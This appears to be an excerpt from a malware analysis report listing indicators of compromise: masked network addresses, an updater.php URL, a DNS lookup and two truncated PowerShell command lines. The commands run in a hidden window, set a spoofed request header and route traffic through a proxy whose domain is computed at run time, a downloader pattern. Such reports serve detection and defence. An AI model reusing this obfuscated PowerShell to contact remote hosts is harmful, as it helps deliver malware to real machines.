Technical Information
- '5.##.222.65':80
- http://ma##.com/updater.php
- DNS ASK 22##067.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -c "$l=New-Object System.Net.WebClient;$l.Headers.add('X-Requested-With','Java-1337');$l.proxy=(New-Object System.Net.WebProxy(([Net.IPAddress]([Net.Dns]::GetHostAddresses(''+(599*3733)+'.com')...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -c "$l=New-Object System.Net.WebClient;$l.Headers.add('X-Requested-With','Java-1337');$l.proxy=(New-Object System.Net.WebProxy(([Net.IPAddress]([Net.Dns]::GetHostAddresses(''+(599*3733)+'.com')...